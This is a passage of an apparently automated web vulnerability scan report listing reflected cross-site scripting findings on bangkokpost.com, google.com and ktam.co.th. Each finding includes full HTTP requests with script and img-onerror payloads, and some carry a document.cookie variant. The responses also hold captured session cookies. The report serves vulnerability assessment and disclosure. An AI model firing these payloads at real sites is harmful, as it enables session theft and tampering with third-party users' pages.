Set-Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiaGlzZnJtbmY2NGtqa2RzbXI4M3JiNzJ0ODMiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjE1OiIxNzMuMTkzLjIxNC4yNDMiO3M6NjoiU1RBVFVTIjtzOjc6InN1Y2Nlc3MiO30%3D; path=/; domain=.bangkokpost.com; httponly
Set-Cookie: PHPSESSID=be6rurs3kl22hu0a7pckfnbgf5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bangkokpost : B
...[SNIP]...
<form method="post" action="/business/company-in-thailandb6a76"><script>alert(1)</script>5e0e2a10af5/financial/search/" id="travelSearch" onsubmit="return chkQuery('key','travelSearch','/business/company-in-thailandb6a76">
...[SNIP]...

5.69. http://www.bangkokpost.com/business/company-in-thailand/financial/search/x26amp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /business/company-in-thailand/financial/search/x26amp

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d8746<img%20src%3da%20onerror%3dalert(1)>8a060fad1aa was submitted in the REST URL parameter 2. This input was echoed as d8746<img src=a onerror=alert(1)>8a060fad1aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /business/company-in-thailandd8746<img%20src%3da%20onerror%3dalert(1)>8a060fad1aa/financial/search/x26amp HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:40:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiZGdzaGtxMXFqbmFramI0YWFsNW1kOGI4YzUiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjE1OiIxNzMuMTkzLjIxNC4yNDMiO3M6NjoiU1RBVFVTIjtzOjc6InN1Y2Nlc3MiO30%3D; path=/; domain=.bangkokpost.com; httponly
Set-Cookie: PHPSESSID=1lurb7kr48bkf8m8e3np2epar0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bangkokpost : B
...[SNIP]...
<h1 class="mainTitle">Bangkok Post : Bangkokpost : Business | company-in-thailandd8746<img src=a onerror=alert(1)>8a060fad1aa | financial | search | x26amp</h1>
...[SNIP]...

5.70. http://www.bangkokpost.com/business/company-in-thailand/financial/search/x26amp [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /business/company-in-thailand/financial/search/x26amp

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b36d"><script>alert(1)</script>ea1d9283a7c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /business/company-in-thailand/financial3b36d"><script>alert(1)</script>ea1d9283a7c/search/x26amp HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:41:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoidW9wZzVmb29xOHNiMjlhZnN0OGhjYTEzcjAiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjE1OiIxNzMuMTkzLjIxNC4yNDMiO3M6NjoiU1RBVFVTIjtzOjc6InN1Y2Nlc3MiO30%3D; path=/; domain=.bangkokpost.com; httponly
Set-Cookie: PHPSESSID=7v0d3t5emql826ovbst4chfe47; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21354

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bangkokpost : B
...[SNIP]...
<form method="post" action="/business/company-in-thailand/financial3b36d"><script>alert(1)</script>ea1d9283a7c/search/" id="travelSearch" onsubmit="return chkQuery('key','travelSearch','/business/company-in-thailand/financial3b36d">
...[SNIP]...

5.71. http://www.bangkokpost.com/business/company-in-thailand/financial/search/x26amp [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /business/company-in-thailand/financial/search/x26amp

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c27b5<img%20src%3da%20onerror%3dalert(1)>76b6c36c1a6 was submitted in the REST URL parameter 3. This input was echoed as c27b5<img src=a onerror=alert(1)>76b6c36c1a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /business/company-in-thailand/financialc27b5<img%20src%3da%20onerror%3dalert(1)>76b6c36c1a6/search/x26amp HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:41:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiazlmbnBwdTZpc2YycXZqcDZxcXExMHNpNDUiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjE1OiIxNzMuMTkzLjIxNC4yNDMiO3M6NjoiU1RBVFVTIjtzOjc6InN1Y2Nlc3MiO30%3D; path=/; domain=.bangkokpost.com; httponly
Set-Cookie: PHPSESSID=bp6voil836ht1ga0i90f4hfhp7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bangkokpost : B
...[SNIP]...
<h1 class="mainTitle">Bangkok Post : Bangkokpost : Business | Company in Thailand | financialc27b5<img src=a onerror=alert(1)>76b6c36c1a6 | search | x26amp</h1>
...[SNIP]...

5.72. http://www.bangkokpost.com/business/company-in-thailand/financial/search/x26amp [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /business/company-in-thailand/financial/search/x26amp

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 45064<img%20src%3da%20onerror%3dalert(1)>a1601881358 was submitted in the REST URL parameter 4. This input was echoed as 45064<img src=a onerror=alert(1)>a1601881358 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /business/company-in-thailand/financial/search45064<img%20src%3da%20onerror%3dalert(1)>a1601881358/x26amp HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:42:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiZXNnbmw4cXFoYmo4MDFxaGE4YmpuZzJjdDIiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjE1OiIxNzMuMTkzLjIxNC4yNDMiO3M6NjoiU1RBVFVTIjtzOjc6InN1Y2Nlc3MiO30%3D; path=/; domain=.bangkokpost.com; httponly
Set-Cookie: PHPSESSID=7r5lvnugai01bmo8pai02ts4a1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bangkokpost : B
...[SNIP]...
<h1 class="mainTitle">Bangkok Post : Bangkokpost : Business | Company in Thailand | Financial | search45064<img src=a onerror=alert(1)>a1601881358 | x26amp</h1>
...[SNIP]...

5.73. http://www.bangkokpost.com/business/company-in-thailand/financial/search/x26amp [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /business/company-in-thailand/financial/search/x26amp

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8080"><img%20src%3da%20onerror%3dalert(1)>dfcd012bd40 was submitted in the REST URL parameter 5. This input was echoed as e8080"><img src=a onerror=alert(1)>dfcd012bd40 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /business/company-in-thailand/financial/search/x26ampe8080"><img%20src%3da%20onerror%3dalert(1)>dfcd012bd40 HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:42:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoicmYwcDhrZjM0Z3U5N3YyOGZicThvZGpjaDEiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjE1OiIxNzMuMTkzLjIxNC4yNDMiO3M6NjoiU1RBVFVTIjtzOjc6InN1Y2Nlc3MiO30%3D; path=/; domain=.bangkokpost.com; httponly
Set-Cookie: PHPSESSID=dg5giegaddphgg22s61bknqrf3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21507

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bangkokpost : B
...[SNIP]...
<meta name="keywords" content="news,breaking news,latest news, Business, Company in Thailand, Financial : x26ampe8080"><img src=a onerror=alert(1)>dfcd012bd40, current news,world news,national news,business news,Thai news" />
...[SNIP]...

5.74. http://www.bangkokpost.com/business/company-in-thailand/financial/search/x26amp [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /business/company-in-thailand/financial/search/x26amp

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8aa66<img%20src%3da%20onerror%3dalert(1)>fbd3afe0a9f was submitted in the REST URL parameter 5. This input was echoed as 8aa66<img src=a onerror=alert(1)>fbd3afe0a9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /business/company-in-thailand/financial/search/x26amp8aa66<img%20src%3da%20onerror%3dalert(1)>fbd3afe0a9f HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:43:11 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoicjNpdnAxNXF0ajhjOGNxc2FvYzlkZjg4OTMiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjE1OiIxNzMuMTkzLjIxNC4yNDMiO3M6NjoiU1RBVFVTIjtzOjc6InN1Y2Nlc3MiO30%3D; path=/; domain=.bangkokpost.com; httponly
Set-Cookie: PHPSESSID=77fmi84hpv3d5ps1kcmc9rp507; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bangkokpost : B
...[SNIP]...
<h1 class="mainTitle">Bangkok Post : Bangkokpost : Business | Company in Thailand | Financial | search | x26amp8aa66<img src=a onerror=alert(1)>fbd3afe0a9f</h1>
...[SNIP]...

5.75. http://www.bangkokpost.com/forum/viewtopic.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /forum/viewtopic.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 399d4"-alert(1)-"f661d84ae88 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forum/viewtopic.php/399d4"-alert(1)-"f661d84ae88 HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:38:44 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: phpbb3_forum_u=1; expires=Wed, 02-May-2012 13:38:44 GMT; path=/; domain=.bangkokpost.com; HttpOnly
Set-Cookie: phpbb3_forum_k=; expires=Wed, 02-May-2012 13:38:44 GMT; path=/; domain=.bangkokpost.com; HttpOnly
Set-Cookie: phpbb3_forum_sid=d0d8484c44c6090be03d1eb113d9c39b; expires=Wed, 02-May-2012 13:38:44 GMT; path=/; domain=.bangkokpost.com; HttpOnly
Set-Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiNjlxNjkxajczdDN1ZTVpcXMxdjFmY2VjNDIiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjE1OiIxNzMuMTkzLjIxNC4yNDMiO3M6NjoiU1RBVFVTIjtzOjc6InN1Y2Nlc3MiO30%3D; path=/; domain=.bangkokpost.com; httponly
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-gb" xml:lang="en-gb">
<hea
...[SNIP]...
<SCRIPT LANGUAGE="javascript1.1"> __th_page="forum-399d4"-alert(1)-"f661d84ae88";</SCRIPT>
...[SNIP]...

5.76. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.google.com
Path:   /advanced_search

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 575eb(a)82b386816b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advanced_search?575eb(a)82b386816b5=1 HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=46=acSPd8Kefo7UVfp2rrsX7MvMbbFbC_p0DFBwNMSS9hIpvqoBS7sbRUdsd-3AK6Z1qzfNC-3jjdoFTI8QMr8hgigvHeieDToRNhf6IyV8kWDDFmb39r-VWGRaILAhefvc; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:29:41 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google Advanced Search</title><style id=gstyle>html{overflow-y:scroll}div,td,.n a,.n a:visited{color:#000}.ts td,.
...[SNIP]...
t()});
})();
;}catch(e){google.ml(e,false,{'cause':'defer'});}if(google.med) {google.med('init');google.initHistory();google.med('history');}google.History&&google.History.initialize('/advanced_search?575eb(a)82b386816b5\x3d1')});if(google.j&&google.j.en&&google.j.xi){window.setTimeout(google.j.xi,0);}</script>
...[SNIP]...

5.77. http://www.ktam.co.th/en/alliance.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/alliance.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72069"><img%20src%3da%20onerror%3dalert(1)>67ca8253b6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 72069\"><img src=a onerror=alert(1)>67ca8253b6d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/alliance.php/72069"><img%20src%3da%20onerror%3dalert(1)>67ca8253b6d HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=e751e0758cd81a354193794d79a5a717

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:25:44 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 24919


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>Krung Thai Asset Management Public Company Limited. :- Happy Life Happy Investment</title>
<link href="style
...[SNIP]...
<a href="../th/72069\"><img src=a onerror=alert(1)>67ca8253b6d" title="THAI">
...[SNIP]...

5.78. http://www.ktam.co.th/en/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba2b9"><img%20src%3da%20onerror%3dalert(1)>af4f8f44d0f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ba2b9\"><img src=a onerror=alert(1)>af4f8f44d0f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ba2b9"><img%20src%3da%20onerror%3dalert(1)>af4f8f44d0f HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktb.co.th/en/main/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:52:47 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Set-Cookie: PHPSESSID=3b7ee77d888366dba59cfd0298d0cdc0; path=/
Connection: close
Content-Type: text/html
Content-Length: 29513

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/ba2b9\"><img src=a onerror=alert(1)>af4f8f44d0f" title="THAI">
...[SNIP]...

5.79. http://www.ktam.co.th/en/index.php/a [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/a

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff890"><img%20src%3da%20onerror%3dalert(1)>6438a4cf726 was submitted in the REST URL parameter 3. This input was echoed as ff890\"><img src=a onerror=alert(1)>6438a4cf726 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/aff890"><img%20src%3da%20onerror%3dalert(1)>6438a4cf726 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:27:48 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29514

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/aff890\"><img src=a onerror=alert(1)>6438a4cf726" title="THAI">
...[SNIP]...

5.80. http://www.ktam.co.th/en/index.php/declarationnav.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/declarationnav.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3371d"><img%20src%3da%20onerror%3dalert(1)>ae077ea9f98 was submitted in the REST URL parameter 3. This input was echoed as 3371d\"><img src=a onerror=alert(1)>ae077ea9f98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/declarationnav.php3371d"><img%20src%3da%20onerror%3dalert(1)>ae077ea9f98 HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:27:12 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29531

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/declarationnav.php3371d\"><img src=a onerror=alert(1)>ae077ea9f98" title="THAI">
...[SNIP]...

5.81. http://www.ktam.co.th/en/index.php/declarationnav.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
